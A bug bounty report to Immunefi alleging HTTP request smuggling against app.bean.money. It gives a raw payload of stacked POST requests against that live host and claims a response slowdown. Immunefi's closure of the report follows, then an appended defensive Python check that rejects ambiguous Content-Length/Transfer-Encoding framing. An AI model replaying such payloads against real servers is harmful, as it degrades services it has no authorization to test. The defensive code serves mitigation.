Taking down the application/website requiring manual restoration
Description
HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.
Vulnerability Details
Offer a detailed explanation of the vulnerability itself. Do not leave out any relevant information. Code snippets should be supplied whenever helpful, as long as they don’t overcrowd the report with unnecessary details. This section should make it obvious that you understand exactly what you’re talking about, and more importantly, it should be clear by this point that the vulnerability does exist.
Smuggled Request Sample
POST / HTTP/1.1
Host: app.bean.money
Accept: */*
Connection: keep-alive
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Host: app.bean.money

POST / HTTP/1.1
Host: app.bean.money

POST / HTTP/1.1
Host: app.bean.money

POST / HTTP/1.1
Host: app.bean.money
Impact Details
Normally, the processing time for each user's request is approximately 120 milliseconds. However, after injecting the smuggled requests, the server is forced to respond to all the requests as a single request. This significantly increases the load on the server, causing the processing time to spike to 3000 milliseconds. (Additionally, it is possible to retest to apply more pressure on the web server and induce further delay.)
Unfortunately, after reviewing your report, Immunefi has decided to close it due to the assessed impact being out of scope.
Immunefi review:
The impact claimed by the whitehat is in scope of the bug bounty program, but the assessed impact does not match the claimed impact for the following reasons.
The whitehat has not provided enough information on how HTTP Request Smuggling can cause disruption of the entire application for regular users.
The assessed asset IS in scope for the bug bounty program.
Please note that the project will receive a report of the closed submission and may choose to re-open it, but they are not obligated to do so.
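Request smuggling only works when the front end and the back end read different message boundaries out of the same bytes, and the standard mitigation is to refuse any request whose framing could be read two ways. The following is an added example written for this page, not code from the report, from Immunefi or from the program: a strict framing check a front-end proxy could run on the request head before forwarding. The sample requests it is run on are constructed here (the host is a placeholder, not the program's asset), and the function and variable names are this example's own.

```python
"""Strict HTTP/1.1 framing check for a front-end proxy (added example).

Flags the header combinations that make the end of a request ambiguous
between two parsers, which is the precondition for request smuggling.
Takes the conservative option RFC 9112 section 6 leaves to a server:
reject with 400 rather than guess.  Assumes the request head has already
been read from the socket up to the first blank line.
"""
import re

# RFC 9110 token characters, used for header names and transfer-coding names.
_TOKEN = rb"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
# A header name must be followed immediately by ':' (no whitespace before it);
# surrounding whitespace on the value is dropped, anything else must match as-is.
_HEADER_RE = re.compile(rb"^(" + _TOKEN + rb"):[ \t]*(.*?)[ \t]*$")
_CODING_RE = re.compile(rb"^[ \t]*(" + _TOKEN + rb")[ \t]*$")
_KNOWN_CODINGS = {b"chunked", b"gzip", b"deflate", b"identity"}


def parse_head(raw: bytes):
    """Split a request head into (request_line, [(name_lowercased, value), ...]).

    Stops at the first empty line; the body is not inspected here.  Raises
    ValueError on a malformed header line or on obsolete line folding, both of
    which different parsers are known to treat differently."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    if not lines[0]:
        raise ValueError("empty request line")
    headers = []
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t"):
            raise ValueError("obsolete line folding is not accepted")
        m = _HEADER_RE.match(line)
        if m is None:
            raise ValueError("malformed header line: %r" % (line,))
        headers.append((m.group(1).lower(), m.group(2)))
    return lines[0], headers


def framing_violations(raw: bytes) -> list:
    """Return the reasons this request should be rejected instead of forwarded.

    An empty list means Content-Length / Transfer-Encoding give exactly one
    reading of where the message body ends."""
    _, headers = parse_head(raw)
    cl = [v for n, v in headers if n == b"content-length"]
    te = [v for n, v in headers if n == b"transfer-encoding"]
    reasons = []
    if cl and te:
        reasons.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl)) > 1:
        reasons.append("conflicting Content-Length values: %r" % (cl,))
    for v in cl:
        if re.fullmatch(rb"[0-9]+", v) is None:
            reasons.append("Content-Length is not a plain decimal: %r" % (v,))
    if len(te) > 1:
        reasons.append("multiple Transfer-Encoding headers")
    # Every coding must be a clean token we implement, and 'chunked' must be
    # the final one; 'xchunked', stray control characters or unknown codings
    # are exactly the variants one parser tolerates and another does not.
    codings = []
    for v in te:
        for part in v.split(b","):
            m = _CODING_RE.match(part)
            if m is None:
                reasons.append("malformed transfer coding: %r" % (part,))
                continue
            codings.append(m.group(1).lower())
    if te:
        if not codings or codings[-1] != b"chunked":
            reasons.append("Transfer-Encoding does not end with chunked: %r" % (codings,))
        unknown = [c for c in codings if c not in _KNOWN_CODINGS]
        if unknown:
            reasons.append("unknown transfer coding(s): %r" % (unknown,))
    return reasons


def should_reject(raw: bytes) -> bool:
    """True if the front end should answer 400 and close the connection."""
    try:
        return bool(framing_violations(raw))
    except ValueError:
        return True


# Constructed samples for illustration; the host is a placeholder.
UNAMBIGUOUS = (b"POST / HTTP/1.1\r\nHost: app.example.invalid\r\n"
               b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n")
CL_TE = (b"POST / HTTP/1.1\r\nHost: app.example.invalid\r\n"
         b"Content-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n")
OBFUSCATED_TE = (b"POST / HTTP/1.1\r\nHost: app.example.invalid\r\n"
                 b"Transfer-Encoding: xchunked\r\n\r\n")

if __name__ == "__main__":
    for name, sample in [("unambiguous", UNAMBIGUOUS), ("cl-te", CL_TE),
                         ("obfuscated-te", OBFUSCATED_TE)]:
        print(name, "reject" if should_reject(sample) else "forward",
              framing_violations(sample))
```

Run against the head of the report's own sample (Transfer-Encoding only, no Content-Length) the check returns no violation, because a single chunked encoding gives every compliant parser the same body end; the disagreement smuggling relies on needs a second, conflicting framing signal such as a Content-Length alongside it, or a Transfer-Encoding spelling that only one side honours. Rejecting those at the edge, and closing the connection so no already-buffered bytes are reused, removes the condition rather than trying to detect individual payloads.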